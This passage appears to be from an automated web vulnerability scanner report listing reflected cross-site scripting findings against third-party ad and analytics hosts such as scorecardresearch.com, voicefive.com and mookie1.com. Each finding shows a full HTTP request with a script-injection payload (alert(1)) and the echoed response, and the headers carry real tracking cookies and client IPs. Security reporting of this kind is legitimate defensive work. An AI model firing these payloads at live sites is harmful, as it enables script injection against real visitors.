Pragma:
X-Cnection: close
Date: Mon, 14 Feb 2011 01:30:01 GMT
Content-Length: 482

fb_sharepro_render({"error_code":114,"error_msg":"param urls must be an array.","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats"},{"key":"urls","value":"[\"http:\/\/www.legacy.com\/legacies\/2011\/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818\"]ec7bd<img src=a onerror=alert(1)>a0b94148a55"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});

3.103. http://api.js-kit.com/v1/count [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.js-kit.com
Path:   /v1/count

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload d0e85<a>179ca1bd15e was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/count?q=d0e85<a>179ca1bd15e&callback=Reuters.utils.socialCallback&appkey=prod.reuters.com HTTP/1.1
Host: api.js-kit.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Mon, 14 Feb 2011 01:36:03 GMT
Content-Length: 148
Content-Type: application/x-javascript; charset="utf-8"

Reuters.utils.socialCallback({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"d0e85<a>179ca1bd15e\" at 19" });

3.104. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 56ff7<script>alert(1)</script>c505676b722 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction56ff7<script>alert(1)</script>c505676b722&n=ar_int_p85001580&1297650567782 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:38 2011&prad=58087461&arc=40400763&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1297650518%2E886%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:49 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction56ff7<script>alert(1)</script>c505676b722("");

3.105. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload a8148<script>alert(1)</script>634abd05f4d was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3a8148<script>alert(1)</script>634abd05f4d&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:36 GMT
Date: Mon, 14 Feb 2011 01:26:36 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3a8148<script>alert(1)</script>634abd05f4d", c2:"6035338", c3:".uy!", c4:".id!", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

3.106. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 1a8b2<script>alert(1)</script>16a0b4321e1 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12414&c5=&c6=&c10=31476441a8b2<script>alert(1)</script>16a0b4321e1&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:40 GMT
Date: Mon, 14 Feb 2011 01:26:40 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12414", c5:"", c6:"", c10:"31476441a8b2<script>alert(1)</script>16a0b4321e1", c15:"", c16:"", r:""});

3.107. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 7aa03<script>alert(1)</script>33d2ba5508b was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12414&c5=&c6=&c10=3147644&c15=7aa03<script>alert(1)</script>33d2ba5508b HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:40 GMT
Date: Mon, 14 Feb 2011 01:26:40 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12414", c5:"", c6:"", c10:"3147644", c15:"7aa03<script>alert(1)</script>33d2ba5508b", c16:"", r:""});

3.108. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload efa2b<script>alert(1)</script>b32d71508fc was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338efa2b<script>alert(1)</script>b32d71508fc&c3=%EBuy!&c4=%ECid!&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:36 GMT
Date: Mon, 14 Feb 2011 01:26:36 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338efa2b<script>alert(1)</script>b32d71508fc", c3:".uy!", c4:".id!", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

3.109. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 2bc3f<script>alert(1)</script>8a89c7c3d07 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!2bc3f<script>alert(1)</script>8a89c7c3d07&c4=%ECid!&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:36 GMT
Date: Mon, 14 Feb 2011 01:26:36 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!2bc3f<script>alert(1)</script>8a89c7c3d07", c4:".id!", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

3.110. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload ecbe3<script>alert(1)</script>19cfb851d89 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!ecbe3<script>alert(1)</script>19cfb851d89&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:37 GMT
Date: Mon, 14 Feb 2011 01:26:37 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!ecbe3<script>alert(1)</script>19cfb851d89", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

3.111. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload d5698<script>alert(1)</script>41ad9abe9a7 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=57892644d5698<script>alert(1)</script>41ad9abe9a7&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:37 GMT
Date: Mon, 14 Feb 2011 01:26:37 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
score;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!", c5:"57892644d5698<script>alert(1)</script>41ad9abe9a7", c6:"", c10:"", c15:"", c16:"", r:""});

3.112. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload cd70e<script>alert(1)</script>b6f76d922d1 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=57892644&c6=cd70e<script>alert(1)</script>b6f76d922d1& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:38 GMT
Date: Mon, 14 Feb 2011 01:26:38 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
or(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!", c5:"57892644", c6:"cd70e<script>alert(1)</script>b6f76d922d1", c10:"", c15:"", c16:"", r:""});

3.113. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37cdc"><script>alert(1)</script>42f29418bd4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB337cdc"><script>alert(1)</script>42f29418bd4/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB337cdc"><script>alert(1)</script>42f29418bd4/FarmersBranding/2011Q1/BTRT1/728/115666934/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.114. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e176c"><script>alert(1)</script>ba946806cc4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBrandinge176c"><script>alert(1)</script>ba946806cc4/2011Q1/BTRT1/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBrandinge176c"><script>alert(1)</script>ba946806cc4/2011Q1/BTRT1/728/440039318/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.115. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12411"><script>alert(1)</script>948b5d9dd28 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q112411"><script>alert(1)</script>948b5d9dd28/BTRT1/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
